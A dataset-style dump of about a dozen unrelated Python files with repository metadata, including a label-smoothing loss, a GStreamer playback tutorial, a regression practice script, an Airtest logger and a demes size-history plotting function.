63406186486569e40cecf5de8a6cae1dc00ae400 | f54070cd3048a3645cb25f301592a904d387a1c9 | /python_prgrams/testpython/class.py | d90814e0b94bcc93934d6f3342591b4b93ec4eaa | [] | no_license | mak705/Python_interview | 02bded60417f1e6e2d81e1f6cde6961d95da2a8e | aff2d6018fd539dbcde9e3a6b3f8a69167ffca0d | refs/heads/master | 2020-03-22T21:03:34.018919 | 2019-11-15T08:51:34 | 2019-11-15T08:51:34 | 140,653,056 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 220 | py | class PartyAnimal:
x = 0
def party(self):
self.x = self.x + 1
print "so far ", self.x
an = PartyAnimal()
an.party()
an.party()
an.party()
print "Type", type(an)
print "Dir", dir(an)
#PartyAnimal.party(an)
| [
"mak705@gmail.com"
] | mak705@gmail.com |
c749c633bdfd24a7f053d5758c163cb270b8c78a | e4c7bb2f81c305939c94ded69d3a425a53ed5985 | /mundo-2/ex-055.py | eeda2a43d83b6a5b18bbf66b50c1b4abdb22f50d | [
"MIT"
] | permissive | guilhermesm28/python-curso-em-video | 22eecd84fef24bcadbcb04bbfc9a2386dfe526a9 | 50ab4e76b1903e62d4daa579699c5908329b26c8 | refs/heads/master | 2022-10-13T05:45:31.961161 | 2020-06-11T22:59:24 | 2020-06-11T22:59:24 | 267,751,030 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 605 | py | # Faça um programa que leia o peso de cinco pessoas. No final, mostre qual foi o maior e o menor peso lidos.
print('-' * 100)
print('{: ^100}'.format('EXERCÍCIO 055 - MAIOR E MENOR DA SEQUÊNCIA'))
print('-' * 100)
maior = 0
menor = 0
for i in range(1,6):
peso = float(input(f'Peso da {i}ª pessoa: '))
if i == 1:
maior = peso
menor = peso
else:
if peso > maior:
maior = peso
elif peso < menor:
menor = peso
print(f'\nMaior peso: {maior:.2f}kg \nMenor peso: {menor:.2f}kg')
print('-' * 100)
input('Pressione ENTER para sair...')
| [
"devguilhermemoreira@gmail.com"
] | devguilhermemoreira@gmail.com |
c9a3a0c61090dc5a0df06daf9966f3d68d3b0fd0 | b53071f631a030df707197f7403d55d7bbd5b1d1 | /src/utils/label_smoothing_loss.py | 1bd3e03468758014997df6cb3c680003e713b5eb | [] | no_license | JJoving/SMLAT | 4d2baba38a9b0cdc4d5cf307ed1729255500142a | 4bec314ea4ad7b67db1e4b78e3ec1a2fa8d866ba | refs/heads/master | 2020-06-29T07:56:14.371708 | 2019-10-28T12:38:21 | 2019-10-28T12:38:21 | 200,479,610 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,048 | py | import torch
from torch import nn
class LabelSmoothingLoss(nn.Module):
"""Label-smoothing loss
:param int size: the number of class
:param int padding_idx: ignored class id
:param float smoothing: smoothing rate (0.0 means the conventional CE)
:param bool normalize_length: normalize loss by sequence length if True
:param torch.nn.Module criterion: loss function to be smoothed
"""
def __init__(self, size, padding_idx, smoothing, normalize_length=False, criterion=nn.NLLLoss(reduce=False)):
super(LabelSmoothingLoss, self).__init__()
self.criterion = criterion
self.padding_idx = padding_idx
self.confidence = 1.0 - smoothing
self.smoothing = smoothing
self.size = size
self.true_dist = None
self.normalize_length = normalize_length
def forward(self, x, target):
"""Compute loss between x and target
:param torch.Tensor x: prediction (batch, seqlen, class)
:param torch.Tensor target: target signal masked with self.padding_id (batch, seqlen)
:return: scalar float value
:rtype torch.Tensor
"""
#import pdb
#pdb.set_trace()
#assert x.size(2) == self.size
batch_size = x.size(0)
x = x.view(-1, self.size)
target = target.view(-1)
#with torch.no_grad():
true_dist = x.clone()
true_dist.fill_(self.smoothing / (self.size - 1))
ignores = target == self.padding_idx # (B,)
total = len(target) - ignores.sum().item()
target = target.masked_fill(ignores, 0) # avoid -1 index
true_dist.scatter_(1, target.unsqueeze(1), self.confidence)
#kl = self.criterion(torch.log_softmax(x, dim=1), true_dist)
#celoss = -torch.sum(torch.log_softmax(x, dim=1) * true_dist)
celoss = torch.log_softmax(x, dim=1) * true_dist
#denom = total if self.normalize_length else batch_size
#denom = true_dist.size(0)
return -celoss.masked_fill(ignores.unsqueeze(1), 0).sum() | [
"732585148@qq.com"
] | 732585148@qq.com |
fde84b7f86fe2e5414ad0afb303c5772a3a2bfbf | 0769e74f495d697266407e84054a52ea5da7ad49 | /old/src/YoutubeParseHandler.py | bc82f59feb37b5fa99724bf234172d9268943c5c | [
"MIT"
] | permissive | richard-duong/GuessTheClass | 960082dc212d7c8190f6d605735e0a3afb7d486a | e68c2a0a2fbb7b488450d27b36b52f2b4259e0b1 | refs/heads/main | 2023-05-08T04:03:44.594539 | 2021-05-14T22:59:16 | 2021-05-14T22:59:16 | 340,517,890 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 762 | py | import re
import YoutubeRegex
class YoutubeParseHandler:
def __init__(self):
self.__wordsList = []
def __parseFile(self, transcript):
with open(transcript, "r") as inFile:
text = inFile.read()
text = re.sub(YoutubeRegex.BASIC_FILTER + "|" + YoutubeRegex.ACTION + "|"
+ YoutubeRegex.ARROW + "|" + YoutubeRegex.DICTATE_SPEAKER, " ", text)
self.__wordsList = text.split()
def __writeFile(self, filteredFile):
with open(filteredFile, "w") as outFile:
for word in self.__wordsList:
outFile.write("{}\n".format(word.lower()))
def parse(self, transcript, filteredFile):
self.__parseFile(transcript)
self.__writeFile(filteredFile)
| [
"rduon008@ucr.edu"
] | rduon008@ucr.edu |
dc020b3930bd8abb2cf10b358f9075e9aea0aab2 | e5c24e5c810a99bd326384a0d222bc8af0ac3bd9 | /chat_analyzer/models/chat_data.py | 1cd716d120105ae8437a4851d56ebc8ca1970df2 | [] | no_license | sechlol/whatsapp-chat-analyzer | aaaef061de9bd1776204a5e603df98677879a051 | e9506b5a482e9f29e80b0039702df648c5dd0312 | refs/heads/master | 2022-11-27T08:25:23.732721 | 2022-11-20T17:53:45 | 2022-11-20T17:53:45 | 218,354,333 | 0 | 0 | null | 2022-11-20T17:54:33 | 2019-10-29T18:20:02 | Python | UTF-8 | Python | false | false | 1,865 | py | from dataclasses import dataclass, field
from datetime import datetime, date
from typing import List, Dict
from chat_analyzer.models.chat_schemas import ChatMessageStatSchema, StatsWrapperSchema
@dataclass
class Message:
sender: str
date: datetime
text: str
@dataclass
class Chat:
name: str
participants: List[str] = field(default_factory=list)
messages: List[Message] = field(default_factory=list)
def add_message(self, message: Message):
self.messages.append(message)
if message.sender not in self.participants:
self.participants.append(message.sender)
@dataclass
class UserMessageStat:
username: str
message_count: int
message_percent: float
word_count: int
word_percent: float
avg_words_per_message: float
@dataclass
class ChatMessageStat:
total_messages_count: int
total_words_count: int
user_stats: List[UserMessageStat]
def to_json(self):
return ChatMessageStatSchema().dump(self)
@dataclass
class Score:
label: str
value: float
@dataclass
class MessagesPerDayStat:
date_sent: date
scores: List[Score]
def get_labels(self) -> List[str]:
return [s.label for s in self.scores]
def get_indexed_values(self) -> Dict[str, float]:
return {s.label: s.value for s in self.scores}
@dataclass
class StatsWrapper:
legend: List[str]
stats: List[MessagesPerDayStat]
def get_sorted_dates(self) -> List[date]:
return [s.date_sent for s in self.stats]
def get_indexed_by_date(self) -> Dict[date, MessagesPerDayStat]:
return {s.date_sent: s for s in self.stats}
def get_indexed_by_date_raw(self) -> Dict[date, Dict[str, float]]:
return {s.date_sent: s.get_indexed_values() for s in self.stats}
def to_json(self):
return StatsWrapperSchema().dump(self)
| [
"ccardin.sech@gmail.com"
] | ccardin.sech@gmail.com |
6c1bf8a8173f069af524c50af7366e3150d5b5a6 | 5adb0e3bce712efb68b241421cd12e71d0401d98 | /tasks/ehco.py | acf54d41b71c3edc251e2ea7866628ff0119bf2b | [
"MIT"
] | permissive | librestar/backend | 8e945c3953ec59b4717704a5ebfc613ed756cba1 | 9060453d140d4c1785b370fd548be519d04047d4 | refs/heads/main | 2023-02-11T03:36:33.584588 | 2021-01-14T07:34:08 | 2021-01-14T07:34:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,372 | py | import json
import typing as t
import ansible_runner
from uuid import uuid4
from app.db.session import SessionLocal
from app.db.models.port import Port
from app.db.models.user import User
from app.db.models.server import Server
from app.db.models.port_forward import PortForwardRule
from app.db.crud.server import get_server
from app.db.crud.port import get_port
from tasks import celery_app
from tasks.utils.runner import run_async
from tasks.utils.handlers import iptables_finished_handler, status_handler
@celery_app.task()
def ehco_runner(
port_id: int,
server_id: int,
port_num: int,
args: str = None,
remote_ip: str = None,
update_status: bool = False,
**kwargs,
):
server = get_server(SessionLocal(), server_id)
extravars = {
"host": server.ansible_name,
"local_port": port_num,
"remote_ip": remote_ip,
"ehco_args": args,
"update_status": update_status,
"update_ehco": update_status and not server.config.get('ehco'),
}
r = run_async(
server=server,
playbook="ehco.yml",
extravars=extravars,
status_handler=lambda s, **k: status_handler(port_id, s, update_status),
finished_callback=iptables_finished_handler(server, port_id, True)
if update_status
else lambda r: None,
)
return r[1].config.artifact_dir
| [
"me@leishi.io"
] | me@leishi.io |
08e0cb2008377b5bf7623e9235abde9b1ed3838c | f43a35dd0aab1bdbcf4f281281db2f5b2fdfbd5f | /Machine Learning practice/regression.py | 1139a60862f8ab27ce12788267bba239d79f1432 | [] | no_license | ganzhiruyi/Machine-Learning | 8d75ce5f37db9bec426a136cbfbaf4301bdd8a06 | 66dcba15bb41ce4613b055ec673547f429627dcf | refs/heads/master | 2021-01-18T10:03:40.321880 | 2016-03-03T14:43:19 | 2016-03-03T14:43:19 | 39,997,167 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,453 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2016-01-19 10:57:07
# @Author : ganzhiruyi (ganzhiruyi0@gmail.com)
# @Link : https://github.com/ganzhiruyi
# @Version : $1.0$
from numpy import *
import numpy as np
import matplotlib.pyplot as plt
def loadDataSet(filePath):
# 导入数据,数据每行的最后一个是Y值
X = loadtxt(filePath, delimiter='\t')
Y = X[:, -1]
X = X[:, :-1] # 第一个一直是1,表示常数项
return X, Y
def standRegress(X, Y):
# 最小二乘法,返回回归系数
X = mat(X)
Y = mat(Y).transpose()
if linalg.det(X.T * X) == 0.0:
raise ValueError('The matrix is singular, cannot inverse.')
w = (X.T * X).I * (X.T * Y)
return w
def plot2DRegress(X, Y, w):
plt.scatter(X[:, 1], Y) # 画图要把X只取x变量部分
y = X * w
plt.plot(X[:, 1], y)
plt.show()
def lwlr(x, X, Y, k):
# 根据每个点x和整个数据集X的差距,计算一个对应的y值
X = mat(X)
Y = mat(Y).transpose()
m, n = X.shape
weights = mat(eye(m))
for j in range(m):
diffMat = x - X[j, :]
weights[j, j] = exp(diffMat * diffMat.T / (-2.0 * k**2))
xTx = X.T * (weights * X)
if linalg.det(xTx) == 0.0:
raise ValueError('The matrix is singular, cannot inverse.')
w = xTx.I * (X.T * weights * Y)
return x * w
def lwlrTest(testArr, X, Y, k=1.0):
# 得到所有testArr关于X,Y的预测值
m, n = testArr.shape
yHat = zeros(m)
for i in range(m):
yHat[i] = lwlr(testArr[i], X, Y, k)
return yHat
def plot2Dlwlr(X, Y, yHat):
sortedIdices = X[:, 1].argsort()
xSort = X[sortedIdices]
ySort = yHat[sortedIdices]
plt.scatter(X[:, 1], Y)
plt.plot(xSort[:, 1], ySort, c='r')
plt.show()
def regularize(X):
# 按列进行正则化
retX = X.copy()
xMean = mean(retX, axis=0)
invarX = var(retX, axis=0)
retX = (retX - xMean) / invarX
return retX
def rssError(yTrue, yPred):
# 统计均方误差
return ((yTrue - yPred)**2).sum()
def stagewise(X, Y, eps=0.01, numIters=200):
# 前向逐步线性回归
X = mat(X)
m, n = X.shape
Y = mat(Y).transpose()
yMean = mean(Y)
Y = Y - yMean
X = regularize(X) # 这里的这个处理对于第一列全为1就会出错
# from sklearn import preprocessing
# X = preprocessing.normalize(X)
w = zeros((n, 1))
wTest = w.copy()
wBest = w.copy()
returnMat = mat(zeros((numIters, n)))
for i in range(numIters):
minRssError = inf
for j in range(n):
for sign in [-1, 1]:
wTest = w.copy()
wTest[j] += sign * eps
yTest = X * wTest
error = rssError(Y.A, yTest.A)
if error < minRssError:
minRssError = error
wBest = wTest
w = wBest.copy()
returnMat[i, :] = w.T
return returnMat
def plotWs(ws):
# 画出相关系数随迭代次数的变化规律
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(ws)
plt.show()
# X, Y = loadDataSet('data/8-2.txt')
X, Y = loadDataSet('data/8-abalone.txt')
print X
# 测试standRegress
# w = standRegress(X, Y)
# plot2DRegress(X, Y, w)
# 测试lwlr
# yHat = lwlrTest(X,X,Y,k=0.01)
# plot2Dlwlr(X, Y, yHat)
# 测试前向逐步回归 stagewise
ws = stagewise(X, Y, eps=0.005, numIters=1000)
plotWs(ws)
| [
"ganzhiruyi0@gmail.com"
] | ganzhiruyi0@gmail.com |
f4d86205e1bdc26657ecf48b6f002cbc9c14fb93 | 0c7299e097391daefd66d55d3e5e8ed11aa3519e | /helloworld.py | bb18c60a5eb60b7db8cd4e5eaf3f1af6413c09c1 | [] | no_license | shola/caltrain-dashboard | c4560e71a1a3b81bd0ec119e6d1bb17514e7d48c | 289b88c7c9d10cbdfbddc23fdf04bbd6ccef4d2f | refs/heads/master | 2021-01-16T20:48:36.683416 | 2015-06-16T19:52:39 | 2015-06-16T19:52:39 | 37,552,559 | 0 | 0 | null | 2015-06-16T19:52:18 | 2015-06-16T19:52:18 | null | UTF-8 | Python | false | false | 12 | py | merge hell!
| [
"bchoi@splunk.com"
] | bchoi@splunk.com |
6c41461da6b1f280e4708e60c3c8f1ec4ac26eb0 | 94fb9ca84285fa6e570c21208e2e5b2d3ac201db | /Observer/Observer_Controller.py | 28e42cbcfa8ba19b567b11f5d020779f2adb8fb5 | [] | no_license | kmu-cs-swp2-2018/class-01-Kimmyeonghwan | ba3bf280ef7646bf2c9b20305c3bff916d7e918c | b2e77485b257e3e64c3a550a2e757e135d1de73b | refs/heads/master | 2022-12-03T00:40:30.468292 | 2018-11-21T12:17:05 | 2018-11-21T12:17:05 | 146,683,595 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,046 | py | from Observer_View import View
from Observer_Model import Model
def Main():
re = 0
model = Model()
view = View()
while(re != 9):
print("현재 시간 : {}년 {}월 {}일 {}시 {}분 {}초".format(view.ts.tm_year, view.ts.tm_mon, view.ts.tm_mday, view.ts.tm_hour, view.ts.tm_min, view.ts.tm_sec))
print("현재 온도 : {}, 현재 습도 : {}".format(view.temp, view.humidity))
print("날씨 : {}".format(view.weather))
Model.list() # self 사용이 아니라서 model 말고 Model 사용
re = int(input("숫자를 입력해주세요. : "))
if re == 1:
view.todayReplace(model.replaceDay(view.dateReplace()))
if re == 2:
view.weatherReplace(model.replaceWeather())
if re == 3:
view.tempHumidityReplace(model.replaceTempHumidity)
if re == 4:
view.todayNow()
if re == 5:
view.weatherNow()
if re == 6:
view.tempHumidityNow()
if __name__ == '__main__':
Main() | [
"myeonghwan2@kookmin.ac.kr"
] | myeonghwan2@kookmin.ac.kr |
d00b698f5834c6af3e0263f050a51ecf6db3b475 | f040ec51ef570adbd8240555eba1d0cd9709bb6e | /GstExample/basic-tutorial-4.py | 906bb080d1074246a75c505dd7c2248ca9b035a3 | [] | no_license | WassabiVl/WebServerGstreamer | 7d1c8b6a0670bdc60789308237d2c27700fcd573 | 77d8522e297dc04b64a1dfc2dd8fcef539f65778 | refs/heads/master | 2020-03-20T06:23:17.669426 | 2018-08-27T09:48:12 | 2018-08-27T09:48:12 | 137,247,763 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,871 | py | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
# GStreamer SDK Tutorials in Python
#
# basic-tutorial-4
#
"""
basic-tutorial-4: Time management
http://docs.gstreamer.com/display/GstSDK/Basic+tutorial+4%3A+Time+management
"""
import sys
import gi
gi.require_version('Gst', '1.0')
from gi.repository import Gst
Gst.init(None)
# Python version of GST_TIME_ARGS
data = dict()
data["playing"] = False
data["terminate"] = False
data["seek_enabled"] = False
data["seek_done"] = False
data["duration"] = Gst.CLOCK_TIME_NONE
def convert_ns(t):
s, ns = divmod(t, 1000000000)
m, s = divmod(s, 60)
if m < 60:
return "0:%02i:%02i.%i" % (m, s, ns)
else:
h, m = divmod(m, 60)
return "%i:%02i:%02i.%i" % (h, m, s, ns)
def handle_message(data, msg):
if msg.type == Gst.MessageType.ERROR:
err, debug = msg.parse_error()
print("Error received from element %s: %s" % (msg.src.get_name(), err), file=sys.stderr)
print("Debugging information: %s" % debug, file=sys.stderr)
data["terminate"] = True
elif msg.type == Gst.MessageType.EOS:
print("End-Of-Stream reached.")
data["terminate"] = True
elif msg.type == Gst.MessageType.DURATION_CHANGED:
# The duration has changed, mark the current one as invalid
data["duration"] = Gst.CLOCK_TIME_NONE
elif msg.type == Gst.MessageType.STATE_CHANGED:
if msg.src == data["playbin"]:
old_state, new_state, pending_state = msg.parse_state_changed()
print("Pipeline state changed from %s to %s." % (old_state.value_nick, new_state.value_nick))
data["playing"] = (new_state == Gst.State.PLAYING)
if data["playing"]:
query = Gst.Query.new_seeking(Gst.Format.TIME)
if data["playbin"].query(query):
(aux, data["seek_enabled"], start, end) = query.parse_seeking()
if data["seek_enabled"]:
print("Seeking is ENABLED from %s to %s" % (convert_ns(start), convert_ns(end)))
else:
print("Seeking is DISABLED for this stream.")
else:
print("Seeking query failed.", file=sys.stderr)
else:
print("Unexpected message received.", file=sys.stderr)
def main():
# Create the elements
data["playbin"] = Gst.ElementFactory.make("playbin", "playbin")
if not data["playbin"]:
print("Not all elements could be created.", file=sys.stderr)
exit(-1)
# Set the URI to play
data["playbin"].set_property(
"uri", "https://www.freedesktop.org/software/gstreamer-sdk/data/media/sintel_trailer-480p.webm")
# Start playing
ret = data["playbin"].set_state(Gst.State.PLAYING)
if ret == Gst.StateChangeReturn.FAILURE:
print("Unable to set the pipeline to the playing state.", file=sys.stderr)
exit(-1)
# Listen to the bus
bus = data["playbin"].get_bus()
while not data["terminate"]:
message = bus.timed_pop_filtered(100 * Gst.MSECOND,
Gst.MessageType.STATE_CHANGED |
Gst.MessageType.ERROR |
Gst.MessageType.EOS |
Gst.MessageType.DURATION_CHANGED)
# Parse message
if message:
handle_message(data, message)
else:
if data["playing"]:
fmt = Gst.Format.TIME
current = -1
# Query the current position of the stream
_, current = data['playbin'].query_position(fmt)
if not current:
print("Could not query current position", file=sys.stderr)
# If we didn't know it yet, query the stream duration
if data["duration"] == Gst.CLOCK_TIME_NONE:
_, data["duration"] = data['playbin'].query_duration(fmt)
if not data["duration"]:
print("Could not query current duration", file=sys.stderr)
print("Position %s / %s\r" % (
convert_ns(current), convert_ns(data["duration"])), end=' ')
sys.stdout.flush()
# If seeking is enabled, we have not done it yet, and the time is
# right, seek
if data["seek_enabled"] and not data["seek_done"] and current > 10 * Gst.SECOND:
print("\nReached 10s, performing seek...")
data['playbin'].seek_simple(Gst.Format.TIME, Gst.SeekFlags.FLUSH | Gst.SeekFlags.KEY_UNIT,
30 * Gst.SECOND)
data["seek_done"] = True
# Free resources
data["playbin"].set_state(Gst.State.NULL)
main()
| [
"wa@lombego.de"
] | wa@lombego.de |
953f9fc2f8c41cae91dcb576a328561653318abd | 989e16ccb5569cd514a2a0cd41c04392248eeae3 | /airtest/utils/logwraper.py | b86b7d8d0ddf1ce8712d67747ccd8b44f6875b34 | [
"Apache-2.0"
] | permissive | wb-qiujuli/Airtest | 1dc98e385efae4aa18a8ffc879ad6ec7a8f7dbac | 4f73a03a62f11a8010769eda4b53a53a74a8d16c | refs/heads/master | 2020-03-19T01:09:53.709209 | 2018-05-31T01:31:04 | 2018-05-31T01:31:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,116 | py | # _*_ coding:UTF-8 _*_
import os
import sys
import json
import time
import functools
import traceback
from .logger import get_logger
LOGGING = get_logger(__name__)
class AirtestLogger(object):
    """Structured JSON logger that records Airtest function calls.

    Each record is written as one JSON object per line to ``logfile`` (when
    set) and mirrored to the module logger.  ``running_stack`` tracks the
    nesting depth of wrapped calls (see ``Logwrap``); ``extra_log`` carries
    one-shot extra fields merged into the next record.
    """
    def __init__(self, logfile, debug=False):
        super(AirtestLogger, self).__init__()
        self.logfile = None       # resolved path of the current log file
        self.logfd = None         # open file object for logfile, or None
        self.debug = debug
        self.running_stack = []   # stack of in-flight wrapped-call records
        self.extra_log = {}       # extra fields merged into the next record
        self.set_logfile(logfile)
        # atexit.register(self.handle_stacked_log)

    def set_logfile(self, logfile):
        """Switch output to *logfile*, or disable file output when None.

        Pending stacked records are flushed to the old destination first.
        The new file is opened in "w" mode, truncating previous contents.
        """
        if logfile is None:
            self.logfile = None
            self.logfd = None
        else:
            self.handle_stacked_log()
            self.logfile = os.path.realpath(logfile)
            self.logfd = open(self.logfile, "w")

    @staticmethod
    def _dumper(obj):
        # json.dumps fallback: serialize unknown objects via their __dict__,
        # or as null when even that is unavailable.
        try:
            return obj.__dict__
        except:
            return None

    def log(self, tag, data, in_stack=True):
        ''' Not thread safe '''
        # if self.debug:
        #     print(tag, data)
        LOGGING.debug("%s: %s" % (tag, data))
        # depth mirrors the call-nesting level so a log viewer can re-indent.
        if in_stack:
            depth = len(self.running_stack)
        else:
            depth = 1
        if self.logfd:
            try:
                log_data = json.dumps({'tag': tag, 'depth': depth, 'time': time.strftime("%Y-%m-%d %H:%M:%S"), 'data': data}, default=self._dumper)
            except UnicodeDecodeError:
                # Python 2 fallback: retry with repr() decoded from the
                # filesystem encoding when data is not JSON-serializable text.
                log_data = json.dumps({'tag': tag, 'depth': depth, 'time': time.strftime("%Y-%m-%d %H:%M:%S"), 'data': repr(data).decode(sys.getfilesystemencoding())}, default=self._dumper)
            self.logfd.write(log_data + '\n')
            self.logfd.flush()

    def handle_stacked_log(self):
        # Flush any records still sitting on the stack.
        while self.running_stack:
            # Log the top entry first and pop it afterwards, so the depth
            # recorded for each entry stays correct.
            log_stacked = self.running_stack[-1]
            self.log("function", log_stacked)
            self.running_stack.pop()
def Logwrap(f, logger):
    """Decorator factory: wrap *f* so every call is recorded via *logger*.

    The wrapper pushes a record onto ``logger.running_stack`` for the
    duration of the call (so nested wrapped calls log at the right depth),
    then logs either a 'function' record (with time_used and return value)
    or an 'error' record (with traceback) before popping.
    """
    LOGGER = logger
    @functools.wraps(f)
    def wrapper(*args, **kwargs):
        start = time.time()
        fndata = {'name': f.__name__, 'args': args, 'kwargs': kwargs}
        LOGGER.running_stack.append(fndata)
        try:
            res = f(*args, **kwargs)
        except Exception as e:
            data = {"traceback": traceback.format_exc(), "time_used": time.time() - start, "error_str": str(e)}
            fndata.update(data)
            fndata.update(LOGGER.extra_log)
            LOGGER.log("error", fndata)
            # Pop before re-raising so outer frames keep a consistent depth.
            LOGGER.running_stack.pop()
            raise
        else:
            time_used = time.time() - start
            LOGGING.debug("%s%s Time used: %3fs" % ('>' * len(LOGGER.running_stack), f.__name__, time_used))
            # sys.stdout.flush()
            fndata.update({'time_used': time_used, 'ret': res})
            fndata.update(LOGGER.extra_log)
            LOGGER.log('function', fndata)
            LOGGER.running_stack.pop()
        finally:
            # extra_log is one-shot: cleared after every call, success or not.
            LOGGER.extra_log = {}
        return res
    return wrapper
| [
"gzliuxin@corp.netease.com"
] | gzliuxin@corp.netease.com |
fa2acf3dc47b01789ae0535085f48b6e22aff68d | 3e5695a1e80d3696cea8b902d06078f9b77387a7 | /demesdraw/size_history.py | 3b967b152a6b2e700e522df64d6afa7c80562c82 | [] | no_license | apragsdale/demesdraw | 9a3312db81ee58e343272a6b9b517538b0078682 | 26f817a66a7f8fe00c99e41f1b774c501c5a8d3b | refs/heads/main | 2023-03-20T22:09:38.588301 | 2021-03-11T19:51:37 | 2021-03-11T19:51:37 | 346,859,777 | 0 | 0 | null | 2021-03-11T22:42:17 | 2021-03-11T22:42:17 | null | UTF-8 | Python | false | false | 10,190 | py | import demes
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
from demesdraw import utils
def size_history(
    graph: demes.Graph,
    ax: matplotlib.axes.Axes = None,
    inf_ratio: float = 0.1,
    inf_label: bool = False,
    invert_x: bool = False,
    num_exp_points: int = 100,
    annotate_epochs: bool = False,
    cmap: matplotlib.colors.Colormap = None,
    log_x: bool = False,
    log_y: bool = False,
    title: str = None,
):
    """
    Plot population size as a function of time for each deme in the graph.

    :param demes.Graph graph: The demes graph to plot.
    :param matplotlib.axes.Axes ax: The matplotlib axes onto which the figure
        will be drawn. If None, an empty axes will be created for the figure.
    :param float inf_ratio: The proportion of the horizontal axis that will be
        used for the time interval which stretches towards infinity.
    :param bool inf_label: Write "inf" by the arrow that points towards infinity.
    :param bool invert_x: If true, the horizontal axis will have infinity
        on the left and zero on the right, and the vertical axis will be drawn
        on the right.
    :param int num_exp_points: The number of points used to approximate
        size changes in each epoch with exponential size_function.
    :param bool annotate_epochs: Annotate the figure with epoch indices
        over the relevant parts of the lines. This is mostly useful as a
        pedagogical tool.
    :param matplotlib.colors.Colormap cmap: A matplotlib colour map to be used
        for the different demes. Get one with :func:`matplotlib.cm.get_cmap()`.
        If None, tab10 or tab20 will be used, depending on the number of demes.
    :param bool log_x: Use a log-10 scale for the horizontal axis.
    :param bool log_y: Use a log-10 scale for the vertical axis.
    :param str title: The title of the figure.

    :return: The matplotlib axes onto which the figure was drawn.
    :rtype: matplotlib.axes.Axes
    """
    if ax is None:
        fig_w, fig_h = plt.figaspect(9.0 / 16.0)
        _, ax = plt.subplots(figsize=(fig_w, fig_h))
    if invert_x:
        arrowhead = "<k"
    else:
        arrowhead = ">k"
    if cmap is None:
        if len(graph.demes) <= 10:
            cmap = matplotlib.cm.get_cmap("tab10")
        elif len(graph.demes) <= 20:
            cmap = matplotlib.cm.get_cmap("tab20")
        else:
            raise ValueError(
                "Graph has more than 20 demes, so cmap must be specified. Good luck!"
            )
    # Finite x position used to stand in for time=infinity on the plot.
    inf_start_time = utils.inf_start_time(graph, inf_ratio, log_x)
    linestyles = ["solid"]  # , "dashed", "dashdot"]
    linewidths = [2, 4, 8, 1]
    legend_handles = []
    # Top of the z order stacking.
    z_top = 1 + len(graph.demes) + max(linewidths)
    # One styled line per deme; style cycles through the lists above.
    for j, deme in enumerate(graph.demes):
        colour = cmap(j)
        linestyle = linestyles[j % len(linestyles)]
        linewidth = linewidths[j % len(linewidths)]
        plot_kwargs = dict(
            color=colour,
            linestyle=linestyle,
            linewidth=linewidth,
            label=deme.id,
            alpha=0.7,
            zorder=z_top - linewidth,
            solid_capstyle="butt",
        )
        discontinuity_kwargs = dict(
            color=colour,
            linestyle=":",
            linewidth=linewidth,
            alpha=0.7,
            zorder=z_top - linewidth,
            solid_capstyle="butt",
        )
        legend_handles.append(matplotlib.lines.Line2D([], [], **plot_kwargs))
        # Draw each epoch of the deme as a line segment (or exp curve).
        for k, epoch in enumerate(deme.epochs):
            start_time = epoch.start_time
            if np.isinf(start_time):
                start_time = inf_start_time
            end_time = epoch.end_time
            if end_time == 0 and log_x:
                end_time = 1
            if epoch.size_function == "constant":
                x = np.array([start_time, end_time])
                y = np.array([epoch.start_size, epoch.end_size])
            elif epoch.size_function == "exponential":
                x = np.linspace(start_time, end_time, num=num_exp_points)
                dt = np.linspace(0, 1, num=num_exp_points)
                r = np.log(epoch.end_size / epoch.start_size)
                y = epoch.start_size * np.exp(r * dt)
            else:
                raise ValueError(
                    f"Don't know how to plot epoch {k} with "
                    f'"{epoch.size_function}" size_function.'
                )
            ax.plot(x, y, **plot_kwargs)
            if k > 0 and deme.epochs[k - 1].end_size != epoch.start_size:
                # Indicate population size discontinuity.
                ax.plot(
                    [deme.epochs[k - 1].end_time, epoch.start_time],
                    [deme.epochs[k - 1].end_size, epoch.start_size],
                    **discontinuity_kwargs,
                )
            if annotate_epochs:
                # Label position: midpoint of the epoch (geometric mean when
                # the corresponding axis is on a log scale).
                if log_x:
                    text_x = np.exp((np.log(start_time) + np.log(end_time)) / 2)
                else:
                    text_x = (start_time + end_time) / 2
                if log_y:
                    text_y = np.exp(
                        (np.log(1 + epoch.start_size) + np.log(1 + epoch.end_size)) / 2
                    )
                else:
                    text_y = (epoch.start_size + epoch.end_size) / 2
                ax.annotate(
                    f"epoch {k}",
                    (text_x, text_y),
                    ha="center",
                    va="bottom",
                    xytext=(0, 4 + linewidth / 2),  # vertical offset
                    textcoords="offset points",
                    # Give the text some contrast with its background.
                    bbox=dict(
                        boxstyle="round", fc="white", ec="none", alpha=0.6, pad=0
                    ),
                    # This is only really a useful feature with 1 deme,
                    # but at least try to do something reasonable for more demes.
                    color="black" if len(graph.demes) == 1 else colour,
                )
        if np.isinf(deme.start_time):
            # Plot an arrow at the end of the line, to indicate this
            # line extends towards infinity.
            ax.plot(
                inf_start_time,
                deme.epochs[0].start_size,
                arrowhead,
                color=colour,
                clip_on=False,
                zorder=z_top,
            )
            if inf_label:
                ax.annotate(
                    "inf",
                    (inf_start_time, deme.epochs[0].start_size),
                    xytext=(0, -6),  # vertical offset
                    textcoords="offset points",
                    clip_on=False,
                    ha="center",
                    va="top",
                )
        # Indicate population size discontinuities from ancestor demes.
        for ancestor_id in deme.ancestors:
            anc = graph[ancestor_id]
            anc_N = utils.size_of_deme_at_time(anc, deme.start_time)
            deme_N = deme.epochs[0].start_size
            if anc_N != deme_N:
                ax.plot(
                    [deme.start_time, deme.start_time],
                    [anc_N, deme_N],
                    **discontinuity_kwargs,
                )
    if len(graph.demes) > 1:
        leg = ax.legend(handles=legend_handles, ncol=len(graph.demes) // 2)
        leg.set_zorder(z_top)
    if title is not None:
        ax.set_title(title)
    # Arrange the axes spines, ticks and labels.
    ax.set_xlim(1 if log_x else 0, inf_start_time)
    # ax.set_ylim(1 if log_y else 0, None)
